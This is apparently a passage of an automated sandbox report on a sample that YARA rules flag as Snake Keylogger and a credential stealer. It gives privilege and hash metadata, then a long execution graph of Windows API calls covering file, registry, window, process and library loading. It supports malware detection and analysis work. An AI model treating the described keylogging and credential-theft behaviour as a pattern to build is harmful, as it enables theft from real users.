                                                            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2695880589.0000000022EE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:25.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:20.3%
                                                              Total number of Nodes:1460
                                                              Total number of Limit Nodes:48
                                                              execution_graph 4233 404f43 GetDlgItem GetDlgItem 4234 404f95 7 API calls 4233->4234 4242 4051ba 4233->4242 4235 40503c DeleteObject 4234->4235 4236 40502f SendMessageW 4234->4236 4237 405045 4235->4237 4236->4235 4238 40507c 4237->4238 4243 406594 21 API calls 4237->4243 4240 4044d6 22 API calls 4238->4240 4239 40529c 4241 405348 4239->4241 4246 4051ad 4239->4246 4252 4052f5 SendMessageW 4239->4252 4245 405090 4240->4245 4247 405352 SendMessageW 4241->4247 4248 40535a 4241->4248 4242->4239 4267 405229 4242->4267 4287 404e91 SendMessageW 4242->4287 4244 40505e SendMessageW SendMessageW 4243->4244 4244->4237 4251 4044d6 22 API calls 4245->4251 4249 40453d 8 API calls 4246->4249 4247->4248 4255 405373 4248->4255 4256 40536c ImageList_Destroy 4248->4256 4263 405383 4248->4263 4254 405549 4249->4254 4268 4050a1 4251->4268 4252->4246 4258 40530a SendMessageW 4252->4258 4253 40528e SendMessageW 4253->4239 4259 40537c GlobalFree 4255->4259 4255->4263 4256->4255 4257 4054fd 4257->4246 4264 40550f ShowWindow GetDlgItem ShowWindow 4257->4264 4261 40531d 4258->4261 4259->4263 4260 40517c GetWindowLongW SetWindowLongW 4262 405195 4260->4262 4272 40532e SendMessageW 4261->4272 4265 4051b2 4262->4265 4266 40519a ShowWindow 4262->4266 4263->4257 4280 4053be 4263->4280 4292 404f11 4263->4292 4264->4246 4286 40450b SendMessageW 4265->4286 4285 40450b SendMessageW 4266->4285 4267->4239 4267->4253 4268->4260 4271 4050f4 SendMessageW 4268->4271 4273 405177 4268->4273 4274 405132 SendMessageW 4268->4274 4275 405146 SendMessageW 4268->4275 4271->4268 4272->4241 4273->4260 4273->4262 4274->4268 4275->4268 4277 4054c8 4278 4054d3 InvalidateRect 4277->4278 4282 4054df 4277->4282 4278->4282 4279 4053ec SendMessageW 4281 405402 4279->4281 4280->4279 4280->4281 4281->4277 4283 405476 SendMessageW SendMessageW 4281->4283 4282->4257 4301 404e4c 4282->4301 4283->4281 4285->4246 4286->4242 4288 404ef0 SendMessageW 4287->4288 4289 404eb4 GetMessagePos ScreenToClient SendMessageW 4287->4289 4291 404ee8 4288->4291 4290 404eed 4289->4290 4289->4291 4290->4288 4291->4267 4304 406557 lstrcpynW 4292->4304 4294 404f24 4305 40649e wsprintfW 4294->4305 4296 404f2e 4297 40140b 2 API calls 4296->4297 4298 404f37 4297->4298 4306 406557 lstrcpynW 4298->4306 4300 404f3e 4300->4280 4307 404d83 4301->4307 4303 404e61 4303->4257 4304->4294 4305->4296 4306->4300 4308 404d9c 4307->4308 4309 406594 21 API calls 4308->4309 4310 404e00 4309->4310 4311 406594 21 API calls 4310->4311 4312 404e0b 4311->4312 4313 406594 21 API calls 4312->4313 4314 404e21 lstrlenW wsprintfW SetDlgItemTextW 4313->4314 4314->4303 4315 402643 4316 402672 4315->4316 4317 402657 4315->4317 4319 4026a2 4316->4319 4320 402677 4316->4320 4318 402d89 21 API calls 4317->4318 4329 40265e 4318->4329 4322 402dab 21 API calls 4319->4322 4321 402dab 21 API calls 4320->4321 4323 40267e 4321->4323 4324 4026a9 lstrlenW 4322->4324 4332 406579 WideCharToMultiByte 4323->4332 4324->4329 4326 402692 lstrlenA 4326->4329 4327 4026d6 4328 4026ec 4327->4328 4330 4060f9 WriteFile 4327->4330 4329->4327 4329->4328 4333 406128 SetFilePointer 4329->4333 4330->4328 4332->4326 4334 406144 4333->4334 4339 40615c 4333->4339 4335 4060ca ReadFile 4334->4335 4336 406150 4335->4336 4337 406165 SetFilePointer 4336->4337 4338 40618d SetFilePointer 4336->4338 4336->4339 4337->4338 4340 406170 4337->4340 4338->4339 4339->4327 4341 4060f9 WriteFile 4340->4341 4341->4339 3328 4015c6 3329 402dab 21 API calls 3328->3329 3330 4015cd 3329->3330 3347 405ed1 CharNextW CharNextW 3330->3347 3332 401636 3334 401668 3332->3334 3335 40163b 3332->3335 3333 405e53 CharNextW 3336 4015d6 3333->3336 3338 401423 28 API calls 3334->3338 3359 401423 3335->3359 3336->3332 3336->3333 3345 40161c GetFileAttributesW 3336->3345 3353 405b22 3336->3353 3356 405aab CreateDirectoryW 3336->3356 3363 405b05 CreateDirectoryW 3336->3363 3344 401660 3338->3344 3343 40164f SetCurrentDirectoryW 3343->3344 3345->3336 3348 405eee 3347->3348 3351 405f00 3347->3351 3350 405efb CharNextW 3348->3350 3348->3351 3349 405f24 3349->3336 3350->3349 3351->3349 3352 405e53 CharNextW 3351->3352 3352->3351 3354 40694b 5 API calls 3353->3354 3355 405b29 3354->3355 3355->3336 3357 405af7 3356->3357 3358 405afb GetLastError 3356->3358 3357->3336 3358->3357 3360 4055dc 28 API calls 3359->3360 3361 401431 3360->3361 3362 406557 lstrcpynW 3361->3362 3362->3343 3364 405b15 3363->3364 3365 405b19 GetLastError 3363->3365 3364->3336 3365->3364 3366 401946 3367 401948 3366->3367 3368 402dab 21 API calls 3367->3368 3369 40194d 3368->3369 3372 405c63 3369->3372 3412 405f2e 3372->3412 3375 405ca2 3378 405dcd 3375->3378 3426 406557 lstrcpynW 3375->3426 3376 405c8b DeleteFileW 3377 401956 3376->3377 3378->3377 3385 4068b4 2 API calls 3378->3385 3380 405cc8 3381 405cdb 3380->3381 3382 405cce lstrcatW 3380->3382 3427 405e72 lstrlenW 3381->3427 3383 405ce1 3382->3383 3386 405cf1 lstrcatW 3383->3386 3387 405ce7 3383->3387 3388 405de7 3385->3388 3390 405cfc lstrlenW FindFirstFileW 3386->3390 3387->3386 3387->3390 3388->3377 3389 405deb 3388->3389 3444 405e26 lstrlenW CharPrevW 3389->3444 3392 405dc2 3390->3392 3393 405d1e 3390->3393 3392->3378 3395 405da5 FindNextFileW 3393->3395 3405 405c63 64 API calls 3393->3405 3407 4055dc 28 API calls 3393->3407 3410 4055dc 28 API calls 3393->3410 3431 406557 lstrcpynW 3393->3431 3432 405c1b 3393->3432 3440 406317 MoveFileExW 3393->3440 3395->3393 3399 405dbb FindClose 3395->3399 3396 405c1b 5 API calls 3398 405dfd 3396->3398 3400 405e17 3398->3400 3401 405e01 3398->3401 3399->3392 3403 4055dc 28 API calls 3400->3403 3401->3377 3404 4055dc 28 API calls 3401->3404 3403->3377 3406 405e0e 3404->3406 3405->3393 3408 406317 40 API calls 3406->3408 3407->3395 3409 405e15 3408->3409 3409->3377 3410->3393 3447 406557 lstrcpynW 3412->3447 3414 405f3f 3415 405ed1 4 API calls 3414->3415 3416 405f45 3415->3416 3417 405c83 3416->3417 3418 406805 5 API calls 3416->3418 3417->3375 3417->3376 3423 405f55 3418->3423 3419 405f86 lstrlenW 3420 405f91 3419->3420 3419->3423 3422 405e26 3 API calls 3420->3422 3421 4068b4 2 API calls 3421->3423 3424 405f96 GetFileAttributesW 3422->3424 3423->3417 3423->3419 3423->3421 3425 405e72 2 API calls 3423->3425 3424->3417 3425->3419 3426->3380 3428 405e80 3427->3428 3429 405e92 3428->3429 3430 405e86 CharPrevW 3428->3430 3429->3383 3430->3428 3430->3429 3431->3393 3448 406022 GetFileAttributesW 3432->3448 3435 405c48 3435->3393 3436 405c36 RemoveDirectoryW 3438 405c44 3436->3438 3437 405c3e DeleteFileW 3437->3438 3438->3435 3439 405c54 SetFileAttributesW 3438->3439 3439->3435 3441 40632b 3440->3441 3443 406338 3440->3443 3451 40619d 3441->3451 3443->3393 3445 405e42 lstrcatW 3444->3445 3446 405df1 3444->3446 3445->3446 3446->3396 3447->3414 3449 405c27 3448->3449 3450 406034 SetFileAttributesW 3448->3450 3449->3435 3449->3436 3449->3437 3450->3449 3452 4061f3 GetShortPathNameW 3451->3452 3453 4061cd 3451->3453 3455 406312 3452->3455 3456 406208 3452->3456 3478 406047 GetFileAttributesW CreateFileW 3453->3478 3455->3443 3456->3455 3458 406210 wsprintfA 3456->3458 3457 4061d7 CloseHandle GetShortPathNameW 3457->3455 3459 4061eb 3457->3459 3460 406594 21 API calls 3458->3460 3459->3452 3459->3455 3461 406238 3460->3461 3479 406047 GetFileAttributesW CreateFileW 3461->3479 3463 406245 3463->3455 3464 406254 GetFileSize GlobalAlloc 3463->3464 3465 406276 3464->3465 3466 40630b CloseHandle 3464->3466 3480 4060ca ReadFile 3465->3480 3466->3455 3471 406295 lstrcpyA 3474 4062b7 3471->3474 3472 4062a9 3473 405fac 4 API calls 3472->3473 3473->3474 3475 4062ee SetFilePointer 3474->3475 3487 4060f9 WriteFile 3475->3487 3478->3457 3479->3463 3481 4060e8 3480->3481 3481->3466 3482 405fac lstrlenA 3481->3482 3483 405fed lstrlenA 3482->3483 3484 405ff5 3483->3484 3485 405fc6 lstrcmpiA 3483->3485 3484->3471 3484->3472 3485->3484 3486 405fe4 CharNextA 3485->3486 3486->3483 3488 406117 GlobalFree 3487->3488 3488->3466 4342 404646 lstrlenW 4343 404665 4342->4343 4344 404667 WideCharToMultiByte 4342->4344 4343->4344 4345 4049c7 4346 4049f3 4345->4346 4347 404a04 4345->4347 4406 405b9b GetDlgItemTextW 4346->4406 4349 404a10 GetDlgItem 4347->4349 4355 404a6f 4347->4355 4350 404a24 4349->4350 4354 404a38 SetWindowTextW 4350->4354 4359 405ed1 4 API calls 4350->4359 4351 404b53 4356 404d02 4351->4356 4408 405b9b GetDlgItemTextW 4351->4408 4352 4049fe 4353 406805 5 API calls 4352->4353 4353->4347 4360 4044d6 22 API calls 4354->4360 4355->4351 4355->4356 4361 406594 21 API calls 4355->4361 4358 40453d 8 API calls 4356->4358 4363 404d16 4358->4363 4364 404a2e 4359->4364 4365 404a54 4360->4365 4366 404ae3 SHBrowseForFolderW 4361->4366 4362 404b83 4367 405f2e 18 API calls 4362->4367 4364->4354 4371 405e26 3 API calls 4364->4371 4368 4044d6 22 API calls 4365->4368 4366->4351 4369 404afb CoTaskMemFree 4366->4369 4370 404b89 4367->4370 4372 404a62 4368->4372 4373 405e26 3 API calls 4369->4373 4409 406557 lstrcpynW 4370->4409 4371->4354 4407 40450b SendMessageW 4372->4407 4375 404b08 4373->4375 4378 404b3f SetDlgItemTextW 4375->4378 4382 406594 21 API calls 4375->4382 4377 404a68 4380 40694b 5 API calls 4377->4380 4378->4351 4379 404ba0 4381 40694b 5 API calls 4379->4381 4380->4355 4388 404ba7 4381->4388 4383 404b27 lstrcmpiW 4382->4383 4383->4378 4385 404b38 lstrcatW 4383->4385 4384 404be8 4410 406557 lstrcpynW 4384->4410 4385->4378 4387 404bef 4389 405ed1 4 API calls 4387->4389 4388->4384 4393 405e72 2 API calls 4388->4393 4394 404c40 4388->4394 4390 404bf5 GetDiskFreeSpaceW 4389->4390 4392 404c19 MulDiv 4390->4392 4390->4394 4392->4394 4393->4388 4395 404cb1 4394->4395 4397 404e4c 24 API calls 4394->4397 4396 404cd4 4395->4396 4398 40140b 2 API calls 4395->4398 4411 4044f8 KiUserCallbackDispatcher 4396->4411 4399 404c9e 4397->4399 4398->4396 4401 404cb3 SetDlgItemTextW 4399->4401 4402 404ca3 4399->4402 4401->4395 4403 404d83 24 API calls 4402->4403 4403->4395 4404 404cf0 4404->4356 4412 404920 4404->4412 4406->4352 4407->4377 4408->4362 4409->4379 4410->4387 4411->4404 4413 404933 SendMessageW 4412->4413 4414 40492e 4412->4414 4413->4356 4414->4413 3489 401c48 3490 402d89 21 API calls 3489->3490 3491 401c4f 3490->3491 3492 402d89 21 API calls 3491->3492 3493 401c5c 3492->3493 3494 401c71 3493->3494 3495 402dab 21 API calls 3493->3495 3496 402dab 21 API calls 3494->3496 3500 401c81 3494->3500 3495->3494 3496->3500 3497 401cd8 3499 402dab 21 API calls 3497->3499 3498 401c8c 3501 402d89 21 API calls 3498->3501 3502 401cdd 3499->3502 3500->3497 3500->3498 3503 401c91 3501->3503 3504 402dab 21 API calls 3502->3504 3505 402d89 21 API calls 3503->3505 3507 401ce6 FindWindowExW 3504->3507 3506 401c9d 3505->3506 3508 401cc8 SendMessageW 3506->3508 3509 401caa SendMessageTimeoutW 3506->3509 3510 401d08 3507->3510 3508->3510 3509->3510 4415 4028c9 4416 4028cf 4415->4416 4417 4028d7 FindClose 4416->4417 4418 402c2f 4416->4418 4417->4418 3543 4014cb 3544 4055dc 28 API calls 3543->3544 3545 4014d2 3544->3545 4419 405550 4420 405560 4419->4420 4421 405574 4419->4421 4423 405566 4420->4423 4424 4055bd 4420->4424 4422 40557c IsWindowVisible 4421->4422 4430 405593 4421->4430 4422->4424 4426 405589 4422->4426 4425 404522 SendMessageW 4423->4425 4427 4055c2 CallWindowProcW 4424->4427 4428 405570 4425->4428 4429 404e91 5 API calls 4426->4429 4427->4428 4429->4430 4430->4427 4431 404f11 4 API calls 4430->4431 4431->4424 4432 4016d1 4433 402dab 21 API calls 4432->4433 4434 4016d7 GetFullPathNameW 4433->4434 4435 4016f1 4434->4435 4436 401713 4434->4436 4435->4436 4439 4068b4 2 API calls 4435->4439 4437 401728 GetShortPathNameW 4436->4437 4438 402c2f 4436->4438 4437->4438 4440 401703 4439->4440 4440->4436 4442 406557 lstrcpynW 4440->4442 4442->4436 4443 6ff61b67 GetCommandLineW lstrcpynW 4444 6ff61bba 4443->4444 4445 6ff61bd9 4444->4445 4447 6ff618cc CharNextW 4444->4447 4446 6ff618cc CharNextW 4445->4446 4448 6ff61bdf CreateProcessW 4446->4448 4447->4444 4450 6ff61c10 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4448->4450 4451 6ff61c41 ExitProcess 4448->4451 4452 401e53 GetDC 4453 402d89 21 API calls 4452->4453 4454 401e65 GetDeviceCaps MulDiv ReleaseDC 4453->4454 4455 402d89 21 API calls 4454->4455 4456 401e96 4455->4456 4457 406594 21 API calls 4456->4457 4458 401ed3 CreateFontIndirectW 4457->4458 4459 40263d 4458->4459 4460 402955 4461 402dab 21 API calls 4460->4461 4462 402961 4461->4462 4463 402977 4462->4463 4464 402dab 21 API calls 4462->4464 4465 406022 2 API calls 4463->4465 4464->4463 4466 40297d 4465->4466 4488 406047 GetFileAttributesW CreateFileW 4466->4488 4468 40298a 4469 402a40 4468->4469 4472 4029a5 GlobalAlloc 4468->4472 4473 402a28 4468->4473 4470 402a47 DeleteFileW 4469->4470 4471 402a5a 4469->4471 4470->4471 4472->4473 4474 4029be 4472->4474 4475 4032b9 35 API calls 4473->4475 4489 4034ea SetFilePointer 4474->4489 4477 402a35 CloseHandle 4475->4477 4477->4469 4478 4029c4 4479 4034d4 ReadFile 4478->4479 4480 4029cd GlobalAlloc 4479->4480 4481 402a11 4480->4481 4482 4029dd 4480->4482 4484 4060f9 WriteFile 4481->4484 4483 4032b9 35 API calls 4482->4483 4486 4029ea 4483->4486 4485 402a1d GlobalFree 4484->4485 4485->4473 4487 402a08 GlobalFree 4486->4487 4487->4481 4488->4468 4489->4478 4025 403fd7 4026 404150 4025->4026 4027 403fef 4025->4027 4029 404161 GetDlgItem GetDlgItem 4026->4029 4030 4041a1 4026->4030 4027->4026 4028 403ffb 4027->4028 4032 404006 SetWindowPos 4028->4032 4033 404019 4028->4033 4034 4044d6 22 API calls 4029->4034 4031 4041fb 4030->4031 4042 401389 2 API calls 4030->4042 4036 404522 SendMessageW 4031->4036 4053 40414b 4031->4053 4032->4033 4037 404022 ShowWindow 4033->4037 4038 404064 4033->4038 4035 40418b SetClassLongW 4034->4035 4039 40140b 2 API calls 4035->4039 4056 40420d 4036->4056 4043 404042 GetWindowLongW 4037->4043 4044 40413d 4037->4044 4040 404083 4038->4040 4041 40406c DestroyWindow 4038->4041 4039->4030 4045 404088 SetWindowLongW 4040->4045 4046 404099 4040->4046 4097 40445f 4041->4097 4047 4041d3 4042->4047 4043->4044 4049 40405b ShowWindow 4043->4049 4107 40453d 4044->4107 4045->4053 4046->4044 4051 4040a5 GetDlgItem 4046->4051 4047->4031 4052 4041d7 SendMessageW 4047->4052 4049->4038 4050 404461 DestroyWindow EndDialog 4050->4097 4057 4040d3 4051->4057 4058 4040b6 SendMessageW IsWindowEnabled 4051->4058 4052->4053 4054 40140b 2 API calls 4054->4056 4055 404490 ShowWindow 4055->4053 4056->4050 4056->4053 4056->4054 4059 406594 21 API calls 4056->4059 4068 4044d6 22 API calls 4056->4068 4088 4043a1 DestroyWindow 4056->4088 4098 4044d6 4056->4098 4060 4040d8 4057->4060 4061 4040e0 4057->4061 4063 404127 SendMessageW 4057->4063 4064 4040f3 4057->4064 4058->4053 4058->4057 4059->4056 4104 4044af 4060->4104 4061->4060 4061->4063 4063->4044 4066 404110 4064->4066 4067 4040fb 4064->4067 4065 40410e 4065->4044 4069 40140b 2 API calls 4066->4069 4070 40140b 2 API calls 4067->4070 4068->4056 4071 404117 4069->4071 4070->4060 4071->4044 4071->4060 4073 404288 GetDlgItem 4074 4042a5 ShowWindow KiUserCallbackDispatcher 4073->4074 4075 40429d 4073->4075 4101 4044f8 KiUserCallbackDispatcher 4074->4101 4075->4074 4077 4042cf EnableWindow 4082 4042e3 4077->4082 4078 4042e8 GetSystemMenu EnableMenuItem SendMessageW 4079 404318 SendMessageW 4078->4079 4078->4082 4079->4082 4081 403fb8 22 API calls 4081->4082 4082->4078 4082->4081 4102 40450b SendMessageW 4082->4102 4103 406557 lstrcpynW 4082->4103 4084 404347 lstrlenW 4085 406594 21 API calls 4084->4085 4086 40435d SetWindowTextW 4085->4086 4087 401389 2 API calls 4086->4087 4087->4056 4089 4043bb CreateDialogParamW 4088->4089 4088->4097 4090 4043ee 4089->4090 4089->4097 4091 4044d6 22 API calls 4090->4091 4092 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4091->4092 4093 401389 2 API calls 4092->4093 4094 40443f 4093->4094 4094->4053 4095 404447 ShowWindow 4094->4095 4096 404522 SendMessageW 4095->4096 4096->4097 4097->4053 4097->4055 4099 406594 21 API calls 4098->4099 4100 4044e1 SetDlgItemTextW 4099->4100 4100->4073 4101->4077 4102->4082 4103->4084 4105 4044b6 4104->4105 4106 4044bc SendMessageW 4104->4106 4105->4106 4106->4065 4108 404555 GetWindowLongW 4107->4108 4118 404600 4107->4118 4109 40456a 4108->4109 4108->4118 4110 404597 GetSysColor 4109->4110 4111 40459a 4109->4111 4109->4118 4110->4111 4112 4045a0 SetTextColor 4111->4112 4113 4045aa SetBkMode 4111->4113 4112->4113 4114 4045c2 GetSysColor 4113->4114 4115 4045c8 4113->4115 4114->4115 4116 4045d9 4115->4116 4117 4045cf SetBkColor 4115->4117 4116->4118 4119 4045f3 CreateBrushIndirect 4116->4119 4120 4045ec DeleteObject 4116->4120 4117->4116 4118->4053 4119->4118 4120->4119 4490 4014d7 4491 402d89 21 API calls 4490->4491 4492 4014dd Sleep 4491->4492 4494 402c2f 4492->4494 4495 40195b 4496 402dab 21 API calls 4495->4496 4497 401962 lstrlenW 4496->4497 4498 40263d 4497->4498 4206 4020dd 4207 4020ef 4206->4207 4216 4021a1 4206->4216 4208 402dab 21 API calls 4207->4208 4210 4020f6 4208->4210 4209 401423 28 API calls 4217 4022fb 4209->4217 4211 402dab 21 API calls 4210->4211 4212 4020ff 4211->4212 4213 402115 LoadLibraryExW 4212->4213 4214 402107 GetModuleHandleW 4212->4214 4215 402126 4213->4215 4213->4216 4214->4213 4214->4215 4226 4069ba 4215->4226 4216->4209 4220 402170 4222 4055dc 28 API calls 4220->4222 4221 402137 4223 401423 28 API calls 4221->4223 4224 402147 4221->4224 4222->4224 4223->4224 4224->4217 4225 402193 FreeLibrary 4224->4225 4225->4217 4231 406579 WideCharToMultiByte 4226->4231 4228 4069d7 4229 4069de GetProcAddress 4228->4229 4230 402131 4228->4230 4229->4230 4230->4220 4230->4221 4231->4228 4499 402b5e 4500 402bb0 4499->4500 4501 402b65 4499->4501 4502 40694b 5 API calls 4500->4502 4504 402d89 21 API calls 4501->4504 4507 402bae 4501->4507 4503 402bb7 4502->4503 4505 402dab 21 API calls 4503->4505 4506 402b73 4504->4506 4508 402bc0 4505->4508 4509 402d89 21 API calls 4506->4509 4508->4507 4510 402bc4 IIDFromString 4508->4510 4513 402b7f 4509->4513 4510->4507 4511 402bd3 4510->4511 4511->4507 4517 406557 lstrcpynW 4511->4517 4516 40649e wsprintfW 4513->4516 4514 402bf0 CoTaskMemFree 4514->4507 4516->4507 4517->4514 3263 401761 3269 402dab 3263->3269 3267 40176f 3268 406076 2 API calls 3267->3268 3268->3267 3270 402db7 3269->3270 3271 406594 21 API calls 3270->3271 3272 402dd8 3271->3272 3273 401768 3272->3273 3274 406805 5 API calls 3272->3274 3275 406076 3273->3275 3274->3273 3276 406083 GetTickCount GetTempFileNameW 3275->3276 3277 4060bd 3276->3277 3278 4060b9 3276->3278 3277->3267 3278->3276 3278->3277 4518 401d62 4519 402d89 21 API calls 4518->4519 4520 401d73 SetWindowLongW 4519->4520 4521 402c2f 4520->4521 4522 4028e3 4523 4028eb 4522->4523 4524 4028ef FindNextFileW 4523->4524 4526 402901 4523->4526 4525 402948 4524->4525 4524->4526 4528 406557 lstrcpynW 4525->4528 4528->4526 4529 403be7 4530 403bf2 4529->4530 4531 403bf6 4530->4531 4532 403bf9 GlobalAlloc 4530->4532 4532->4531 4533 401568 4534 402ba9 4533->4534 4537 40649e wsprintfW 4534->4537 4536 402bae 4537->4536 4541 40196d 4542 402d89 21 API calls 4541->4542 4543 401974 4542->4543 4544 402d89 21 API calls 4543->4544 4545 401981 4544->4545 4546 402dab 21 API calls 4545->4546 4547 401998 lstrlenW 4546->4547 4549 4019a9 4547->4549 4548 4019ea 4549->4548 4553 406557 lstrcpynW 4549->4553 4551 4019da 4551->4548 4552 4019df lstrlenW 4551->4552 4552->4548 4553->4551 4554 40166f 4555 402dab 21 API calls 4554->4555 4556 401675 4555->4556 4557 4068b4 2 API calls 4556->4557 4558 40167b 4557->4558 4559 402af0 4560 402d89 21 API calls 4559->4560 4562 402af6 4560->4562 4561 402933 4562->4561 4563 406594 21 API calls 4562->4563 4563->4561 4564 4026f1 4565 402d89 21 API calls 4564->4565 4566 402700 4565->4566 4567 40274a ReadFile 4566->4567 4568 4060ca ReadFile 4566->4568 4569 406128 5 API calls 4566->4569 4570 40278a MultiByteToWideChar 4566->4570 4571 40283f 4566->4571 4573 4027b0 SetFilePointer MultiByteToWideChar 4566->4573 4574 402850 4566->4574 4576 40283d 4566->4576 4567->4566 4567->4576 4568->4566 4569->4566 4570->4566 4577 40649e wsprintfW 4571->4577 4573->4566 4575 402871 SetFilePointer 4574->4575 4574->4576 4575->4576 4577->4576 3870 401774 3871 402dab 21 API calls 3870->3871 3872 40177b 3871->3872 3873 4017a3 3872->3873 3874 40179b 3872->3874 3910 406557 lstrcpynW 3873->3910 3909 406557 lstrcpynW 3874->3909 3877 4017a1 3880 406805 5 API calls 3877->3880 3878 4017ae 3879 405e26 3 API calls 3878->3879 3881 4017b4 lstrcatW 3879->3881 3883 4017c0 3880->3883 3881->3877 3882 4068b4 2 API calls 3882->3883 3883->3882 3884 406022 2 API calls 3883->3884 3886 4017d2 CompareFileTime 3883->3886 3887 401892 3883->3887 3889 401869 3883->3889 3890 406557 lstrcpynW 3883->3890 3896 406594 21 API calls 3883->3896 3905 405bb7 MessageBoxIndirectW 3883->3905 3908 406047 GetFileAttributesW CreateFileW 3883->3908 3884->3883 3886->3883 3888 4055dc 28 API calls 3887->3888 3891 40189c 3888->3891 3892 4055dc 28 API calls 3889->3892 3899 40187e 3889->3899 3890->3883 3893 4032b9 35 API calls 3891->3893 3892->3899 3894 4018af 3893->3894 3895 4018c3 SetFileTime 3894->3895 3897 4018d5 CloseHandle 3894->3897 3895->3897 3896->3883 3898 4018e6 3897->3898 3897->3899 3900 4018eb 3898->3900 3901 4018fe 3898->3901 3902 406594 21 API calls 3900->3902 3903 406594 21 API calls 3901->3903 3906 4018f3 lstrcatW 3902->3906 3904 401906 3903->3904 3907 405bb7 MessageBoxIndirectW 3904->3907 3905->3883 3906->3904 3907->3899 3908->3883 3909->3877 3910->3878 4578 4014f5 SetForegroundWindow 4579 402c2f 4578->4579 4580 401a77 4581 402d89 21 API calls 4580->4581 4582 401a80 4581->4582 4583 402d89 21 API calls 4582->4583 4584 401a25 4583->4584 4585 401578 4586 401591 4585->4586 4587 401588 ShowWindow 4585->4587 4588 40159f ShowWindow 4586->4588 4589 402c2f 4586->4589 4587->4586 4588->4589 4590 4023f9 4591 402dab 21 API calls 4590->4591 4592 402408 4591->4592 4593 402dab 21 API calls 4592->4593 4594 402411 4593->4594 4595 402dab 21 API calls 4594->4595 4596 40241b GetPrivateProfileStringW 4595->4596 4597 401ffb 4598 402dab 21 API calls 4597->4598 4599 402002 4598->4599 4600 4068b4 2 API calls 4599->4600 4601 402008 4600->4601 4602 402019 4601->4602 4604 40649e wsprintfW 4601->4604 4604->4602 4605 401b7c 4606 402dab 21 API calls 4605->4606 4607 401b83 4606->4607 4608 402d89 21 API calls 4607->4608 4609 401b8c wsprintfW 4608->4609 4610 402c2f 4609->4610 4232 405b7d ShellExecuteExW 4611 401000 4612 401037 BeginPaint GetClientRect 4611->4612 4613 40100c DefWindowProcW 4611->4613 4615 4010f3 4612->4615 4616 401179 4613->4616 4617 401073 CreateBrushIndirect FillRect DeleteObject 4615->4617 4618 4010fc 4615->4618 4617->4615 4619 401102 CreateFontIndirectW 4618->4619 4620 401167 EndPaint 4618->4620 4619->4620 4621 401112 6 API calls 4619->4621 4620->4616 4621->4620 4622 404980 4623 404990 4622->4623 4624 4049b6 4622->4624 4626 4044d6 22 API calls 4623->4626 4625 40453d 8 API calls 4624->4625 4627 4049c2 4625->4627 4628 40499d SetDlgItemTextW 4626->4628 4628->4624 4629 401680 4630 402dab 21 API calls 4629->4630 4631 401687 4630->4631 4632 402dab 21 API calls 4631->4632 4633 401690 4632->4633 4634 402dab 21 API calls 4633->4634 4635 401699 MoveFileW 4634->4635 4636 4016ac 4635->4636 4642 4016a5 4635->4642 4638 4068b4 2 API calls 4636->4638 4640 4022fb 4636->4640 4637 401423 28 API calls 4637->4640 4639 4016bb 4638->4639 4639->4640 4641 406317 40 API calls 4639->4641 4641->4642 4642->4637 4643 401503 4644 401508 4643->4644 4645 401520 4643->4645 4646 402d89 21 API calls 4644->4646 4646->4645 3299 402304 3300 402dab 21 API calls 3299->3300 3301 40230a 3300->3301 3302 402dab 21 API calls 3301->3302 3303 402313 3302->3303 3304 402dab 21 API calls 3303->3304 3305 40231c 3304->3305 3314 4068b4 FindFirstFileW 3305->3314 3308 402336 lstrlenW lstrlenW 3311 4055dc 28 API calls 3308->3311 3309 402329 3313 402331 3309->3313 3317 4055dc 3309->3317 3312 402374 SHFileOperationW 3311->3312 3312->3309 3312->3313 3315 402325 3314->3315 3316 4068ca FindClose 3314->3316 3315->3308 3315->3309 3316->3315 3318 4055f7 3317->3318 3327 405699 3317->3327 3319 405613 lstrlenW 3318->3319 3320 406594 21 API calls 3318->3320 3321 405621 lstrlenW 3319->3321 3322 40563c 3319->3322 3320->3319 3323 405633 lstrcatW 3321->3323 3321->3327 3324 405642 SetWindowTextW 3322->3324 3325 40564f 3322->3325 3323->3322 3324->3325 3326 405655 SendMessageW SendMessageW SendMessageW 3325->3326 3325->3327 3326->3327 3327->3313 4647 401d86 4648 401d99 GetDlgItem 4647->4648 4649 401d8c 4647->4649 4651 401d93 4648->4651 4650 402d89 21 API calls 4649->4650 4650->4651 4652 401dda GetClientRect LoadImageW SendMessageW 4651->4652 4653 402dab 21 API calls 4651->4653 4655 401e38 4652->4655 4657 401e44 4652->4657 4653->4652 4656 401e3d DeleteObject 4655->4656 4655->4657 4656->4657 4658 402388 4659 40238f 4658->4659 4662 4023a2 4658->4662 4660 406594 21 API calls 4659->4660 4661 40239c 4660->4661 4663 405bb7 MessageBoxIndirectW 4661->4663 4663->4662 4664 402c0a SendMessageW 4665 402c24 InvalidateRect 4664->4665 4666 402c2f 4664->4666 4665->4666 4667 40460c lstrcpynW lstrlenW 3546 40248f 3547 402dab 21 API calls 3546->3547 3548 4024a1 3547->3548 3549 402dab 21 API calls 3548->3549 3550 4024ab 3549->3550 3563 402e3b 3550->3563 3553 4024e3 3556 4024ef 3553->3556 3557 402d89 21 API calls 3553->3557 3554 402dab 21 API calls 3559 4024d9 lstrlenW 3554->3559 3555 402933 3558 40250e RegSetValueExW 3556->3558 3567 4032b9 3556->3567 3557->3556 3561 402524 RegCloseKey 3558->3561 3559->3553 3561->3555 3564 402e56 3563->3564 3587 4063f2 3564->3587 3569 4032d2 3567->3569 3568 403300 3591 4034d4 3568->3591 3569->3568 3594 4034ea SetFilePointer 3569->3594 3573 40346d 3575 4034af 3573->3575 3580 403471 3573->3580 3574 40331d GetTickCount 3576 403457 3574->3576 3583 40336c 3574->3583 3577 4034d4 ReadFile 3575->3577 3576->3558 3577->3576 3578 4034d4 ReadFile 3578->3583 3579 4034d4 ReadFile 3579->3580 3580->3576 3580->3579 3581 4060f9 WriteFile 3580->3581 3581->3580 